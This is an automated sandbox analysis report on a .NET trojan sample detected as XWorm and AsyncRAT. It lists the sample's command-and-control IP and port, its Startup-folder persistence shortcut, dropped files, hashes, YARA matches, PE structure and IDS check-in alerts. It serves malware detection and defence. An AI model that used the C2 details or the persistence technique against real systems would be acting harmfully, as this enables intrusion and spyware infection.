URL: http://crl.micr | Source: powershell.exe, 00000009.00000002.2034818425.000001AD38F0D000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: 18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: https://github.com/Pester/Pester | Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://crl.microsVa | Source: powershell.exe, 00000009.00000002.2034616879.000001AD38DE0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Detection: Avira URL Cloud: safe | Reputation: unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
IP: 208.95.112.1 | Domain: ip-api.com | Country: United States | ASN: 53334 | ASN Name: TUT-AS US | Malicious: false
IP: 45.141.26.170 | Domain: unknown | Country: Netherlands | ASN: 62068 | ASN Name: SPECTRAIP SpectraIP B.V. NL | Malicious: true
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1561582
                                                                Start date and time:2024-11-23 20:54:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 15s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:18fvs4AVae.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@13/20@1/2
                                                                EGA Information:
                                                                • Successful, ratio: 20%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 4008 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: 18fvs4AVae.exe
Timeline (Time | Type | Description):
14:55:03 | API Interceptor | 51x Sleep call for process: powershell.exe modified
14:55:55 | API Interceptor | 449385x Sleep call for process: 18fvs4AVae.exe modified
19:55:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk
Match: 208.95.112.1 (associated samples: Sample Name / URL | Detection | Threat Name | Context)
Sample: cmd.exe | Detection: malicious | Threat Name: Blank Grabber | Context: ip-api.com/json/?fields=225545
Sample: z81zEuzkJPHHV3KYua.exe | Detection: malicious | Threat Name: AgentTesla | Context: ip-api.com/line/?fields=hosting
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: ip-api.com/json/
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: ip-api.com/json/
Sample: NeftPaymentError_details__Emdtd22102024_jpg.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: ip-api.com/json/
Sample: Wire slip account payable.pif.exe | Detection: malicious | Threat Name: AgentTesla | Context: ip-api.com/line/?fields=hosting
Sample: HnJdZm51Xl.exe | Detection: malicious | Threat Name: Amadey, Clipboard Hijacker | Context: ip-api.com/line/
Sample: file.exe | Detection: malicious | Threat Name: JasonRAT | Context: ip-api.com/json/?fields=11827
Sample: Fulloption_V2.1.exe | Detection: malicious | Threat Name: XWorm | Context: ip-api.com/line/?fields=hosting
Sample: BoostFPS.exe | Detection: malicious | Threat Name: XWorm | Context: ip-api.com/line/?fields=hosting
Match: ip-api.com (associated samples: Sample Name / URL | Detection | Threat Name | Context)
Sample: cmd.exe | Detection: malicious | Threat Name: Blank Grabber | Context: 208.95.112.1
Sample: z81zEuzkJPHHV3KYua.exe | Detection: malicious | Threat Name: AgentTesla | Context: 208.95.112.1
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: NeftPaymentError_details__Emdtd22102024_jpg.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: Wire slip account payable.pif.exe | Detection: malicious | Threat Name: AgentTesla | Context: 208.95.112.1
URL: http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | Detection: malicious | Threat Name: Unknown | Context: 208.95.112.2
Sample: HnJdZm51Xl.exe | Detection: malicious | Threat Name: Amadey, Clipboard Hijacker | Context: 208.95.112.1
Sample: file.exe | Detection: malicious | Threat Name: JasonRAT | Context: 208.95.112.1
Sample: Fulloption_V2.1.exe | Detection: malicious | Threat Name: XWorm | Context: 208.95.112.1
Match: TUT-AS US (associated samples: Sample Name / URL | Detection | Threat Name | Context)
Sample: cmd.exe | Detection: malicious | Threat Name: Blank Grabber | Context: 208.95.112.1
Sample: z81zEuzkJPHHV3KYua.exe | Detection: malicious | Threat Name: AgentTesla | Context: 208.95.112.1
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: Listing_error_15_code_file-002.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: NeftPaymentError_details__Emdtd22102024_jpg.jar | Detection: malicious | Threat Name: Caesium Obfuscator, STRRAT | Context: 208.95.112.1
Sample: Wire slip account payable.pif.exe | Detection: malicious | Threat Name: AgentTesla | Context: 208.95.112.1
URL: http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | Detection: malicious | Threat Name: Unknown | Context: 208.95.112.2
Sample: HnJdZm51Xl.exe | Detection: malicious | Threat Name: Amadey, Clipboard Hijacker | Context: 208.95.112.1
Sample: file.exe | Detection: malicious | Threat Name: JasonRAT | Context: 208.95.112.1
Sample: Fulloption_V2.1.exe | Detection: malicious | Threat Name: XWorm | Context: 208.95.112.1
Match: SPECTRAIP SpectraIP B.V. NL (associated samples: Sample Name / URL | Detection | Threat Name | Context)
Sample: Fulloption_V2.1.exe | Detection: malicious | Threat Name: XWorm | Context: 45.141.27.248
Sample: BoostFPS.exe | Detection: malicious | Threat Name: XWorm | Context: 45.141.27.248
Sample: bPRQRIfbbq.exe | Detection: malicious | Threat Name: Unknown | Context: 45.138.16.44
Sample: 4Fm0sK0yKz.exe | Detection: malicious | Threat Name: AsyncRAT | Context: 45.141.215.18
Sample: Payload 94.75 (3).225.exe | Detection: malicious | Threat Name: Unknown | Context: 45.141.215.40
Sample: Payload 94.75 (2).225.exe | Detection: malicious | Threat Name: Unknown | Context: 45.141.215.116
Sample: Payload 94.75 (3).225.exe | Detection: malicious | Threat Name: Unknown | Context: 45.138.16.76
Sample: Payload 94.75 (2).225.exe | Detection: malicious | Threat Name: Unknown | Context: 45.141.215.21
Sample: Payload 94.75.225.exe | Detection: malicious | Threat Name: Unknown | Context: 45.141.215.61
URL: https://alcatrazpackages.com/elchapo.html | Detection: malicious | Threat Name: Unknown | Context: 45.87.42.74
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):51200
                                                                Entropy (8bit):5.451736682018347
                                                                Encrypted:false
                                                                SSDEEP:1536:Of05a/CTjS894Fc9UR68OMqddS1EAd8IIR:Of05a/CTJ94Fc9U3OM6gEA6IIR
                                                                MD5:59A9510540FEC35043B990DEB270B139
                                                                SHA1:54D66862A4C08EBCBA8029EC99D558725603F486
                                                                SHA-256:9C113DA0D913A9FD2A84C5C9A71DA4338E3F16A62B8215ECB7A58D10CCAB524F
                                                                SHA-512:011EA8FFE125A6F68F149A0A5B7BCD95197AC8B7D3D7D362807EF984E971411F2B125921FBCBC183E95633555AC58C4E287B6A858F19E077DD9A8EB0975E3E06
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\VLC_Media.exe, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%8g................................. ........@.. ....................... ............@.................................T...W........+........................................................................... ............... ..H............text........ ...................... ..`.rsrc....+.......,..................@..@.reloc..............................@..B........................H.......|]...Y............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 18:55:55 2024, mtime=Sat Nov 23 18:55:55 2024, atime=Sat Nov 23 18:55:55 2024, length=51200, window=hide
                                                                Category:dropped
                                                                Size (bytes):675
                                                                Entropy (8bit):4.5950412219183265
                                                                Encrypted:false
                                                                SSDEEP:12:8HWWEWcU5cCjObegSLwLj45fOjActb1PzHKc5KcBBmV:8HWWNMr/4QAwVqcUcBBm
                                                                MD5:58E8A2F19E508019E405D82B45630D71
                                                                SHA1:461842DABD22A1E0AA58A3CE05A7A561F0F0692B
                                                                SHA-256:9AFBCD90AE8F6FF6B2228C03E36F0B519D2AE69504BCA0D600FAF853F5A79384
                                                                SHA-512:EB78896F0281E2562A2C0A9026A9409EB929F0CC88BE55E37F03781D24A2697C2CDA40F58DE967695C5067BE568793280BABAF21394C8E607D879A957DE5BDAB
                                                                Malicious:false
                                                                Preview:L..................F.... .......=.......=.......=...............................P.O. .:i.....+00.../C:\...................`.1.....wY.. PROGRA~3..H......O.IwY.....g.....................Oo .P.r.o.g.r.a.m.D.a.t.a.....h.2.....wY.. VLC_ME~1.EXE..L......wY..wY............,...............M...V.L.C._.M.e.d.i.a...e.x.e.......K...............-.......J...........i.&r.....C:\ProgramData\VLC_Media.exe..4.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.V.L.C._.M.e.d.i.a...e.x.e.`.......X.......332260...........hT..CrF.f4... .*.F.....,.......hT..CrF.f4... .*.F.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.451736682018347
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:18fvs4AVae.exe
                                                                File size:51'200 bytes
                                                                MD5:59a9510540fec35043b990deb270b139
                                                                SHA1:54d66862a4c08ebcba8029ec99d558725603f486
                                                                SHA256:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
                                                                SHA512:011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06
                                                                SSDEEP:1536:Of05a/CTjS894Fc9UR68OMqddS1EAd8IIR:Of05a/CTJ94Fc9U3OM6gEA6IIR
                                                                TLSH:13336C4477C44222D5FE5BF999B356460730AE038923DB5E0CD8AE9B3B637C48B127D6
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%8g................................. ........@.. ....................... ............@................................
                                                                Icon Hash:4c5e16933971838c
                                                                Entrypoint:0x40b7ae
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x673825D0 [Sat Nov 16 04:55:44 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb754 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x2b1c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x97b4 | 0x9800 | e130d458ef2cd9049e881ec270925f64 | False | 0.49223889802631576 | data | 5.70756197062875 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x2b1c | 0x2c00 | 37c983ba9f88bbb210dd403862e7123d | False | 0.3532492897727273 | data | 3.942086469508632 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0xc | 0x200 | 632045a602183aa3c38b803477d675ed | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc130 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.34221991701244814
RT_GROUP_ICON | 0xe6d8 | 0x14 | data | | | 1.1
RT_VERSION | 0xe6ec | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0xe930 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T20:56:06.689976+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:06.689976+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:07.443101+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:08.027932+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:08.091499+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:19.446957+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:19.448824+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:30.886735+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:30.891652+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:36.678510+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:36.678510+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:42.292240+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:42.296449+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:53.715117+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
